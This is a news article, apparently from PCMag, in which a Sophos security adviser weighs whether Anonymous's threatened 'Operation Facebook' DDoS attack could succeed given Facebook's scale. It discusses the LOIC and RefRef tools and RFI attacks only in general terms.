How credible is the Anonymous threat to "destroy" and "kill" Facebook on Nov. 5? PCMag spoke with Sophos senior security adviser Chester Wisniewski Wednesday to get a read on whether the loosely organized hacking group could actually pull it off.
The first question Wisniewski had concerned whether the so-called Operation Facebook threat is actually coming from Anonymous itself.
"When you decide to become associated or affiliated with anyone who can decide that they don't want to disclose their identity, then I guess anyone can speak for the group. I could be Anonymous or you could be Anonymous," he said.
It's a point worth raising, because AnonOps, as close to a reliable mouthpiece as there is for goings-on within Anonymous writ large, initially distanced itself from Operation Facebook.
"We don't 'kill' the messenger. That's not our style," the @anonops Twitter feed tweeted early Wednesday morning. Indeed, AnonOps and the affiliated hacker group LulzSec have used social media to spread its PR message to great effect in recent months.
But AnonOps later tweeted that Operation Facebook was "is being organised by some Anons. This does not necessarily mean that all of #Anonymous agrees with it."
A more interesting question is whether Anonymous could possibly take down the social networking giant, even at full strength. And AnonOps may have had good reason to be wary of Operation Facebook, given that Anonymous has attempted such an ambitious operation before, according to Wisniewski.
"Theoretically, any website can be taken down, if you have a large enough group of people who want to take it down," he said. "Certainly, we've seen Anonymous take on Facebook in the past, around the New Year. And there were some tweets from, I think, AnonOps, saying things like, 'Holy crap! We were only able to impact it for a few seconds.'"
Anonymous had similarly dismal results in an attempted take-down of Amazon—and there's a reason for that. The language of the Operation Facebook announcement suggests a Distributed Denial-of-Service (DDoS) attack of the sort Anonymous and LulzSec have used to temporarily shut down websites belonging to the CIA, the U.K.'s Organized Crime Agency, and others.
But such blunt-force attacks, which basically bombard websites with so many external requests that they simply can't stay online, aren't likely to work on Facebook, Wisniewski said.
Read if it is even possible to DDoS a site with Facebook's scale and resources, on the next page...
Copyright © 2010 Ziff Davis Publishing Holdings Inc.
Why you can't DDoS a Facebook
"Whether [Operation Facebook] is even a credible threat is one question," Wisniewski said. "The other question is, if it is a credible threat, do they have the resources to take down a Facebook? And the answer to that, certainly through DDoS, is that it's very unlikely. Amazon, Microsoft, Google, Facebook, these guys have globally distributed, massively redundant resources available to them."
Such websites "will either have that spare capacity themselves" to handle even a massive DDoS attack without going offline, he added, "or have relationships with the back haul carriers to get it if they need it."
One intriguing development, however, is Anonymous' recent announcement that the collective plans to retire its "Low Orbit Ion Cannon" DDoS tool in favor of a new, more sophisticated tool called RefRef that supposedly uses an SQL exploit to conduct website take-downs.
The Low Orbit Ion Cannon, or LOIC, is essentially a voluntary botnet that leverages the power of a large amount of "infected" PCs belonging to Anonymous members to launch massive DDoS attacks against targeted sites.
The LOIC's replacement could "have an enormous impact," according to Wisniewski, "if they're not full of crap."
"To begin with, LOIC is the least sophisticated possible thing you can do," the Sophos security adviser said. "Without taking [RefRef] apart, it's really difficult to know what it does. But what they're saying [with the new tool] is that there is a weakness or a flaw in a lot of websites that, by sending a specially crafted Web request, you can cache some Java Script on the Web server itself, and get the Web server to do the DoS'ing [of its own website] for you."
Imperva found that the group turned a relatively little known intrusion tool called an RFI attack into a new way to conduct a DDoS attack.
"In other words, LulzSec used an often overlooked vulnerability to help ambush their targets," Imperva director of security strategy Rob Rachwald told PCMag in June. "An RFI attack inserts some nasty code into a Web application server. What does the code do? Usually, RFI is used to take over the Web application and steal data. In the case of LulzSec, they used it to conduct DDoS attacks."
But even if RefRef turns out to be a better tool than the LOIC, it's not likely to work with Facebook, Wisniewski said.
"From the standpoint of Facebook, a RefRef attack shouldn't be possible as very little SQL is in use at Facebook and what is in use is heavily abstracted from the internet."
Another possibility, of course, is that the Anons running Operation Facebook aren't planning a DDoS attack at all. In addition to website shutdowns, the hacking collective has also pulled off or had a hand in network intrusions, some showcasing fairly clever attack vectors, according to Imperva.
Perhaps Operation Facebook has less to do with simply taking the site offline than everybody thinks.
Copyright © 2010 Ziff Davis Publishing Holdings Inc.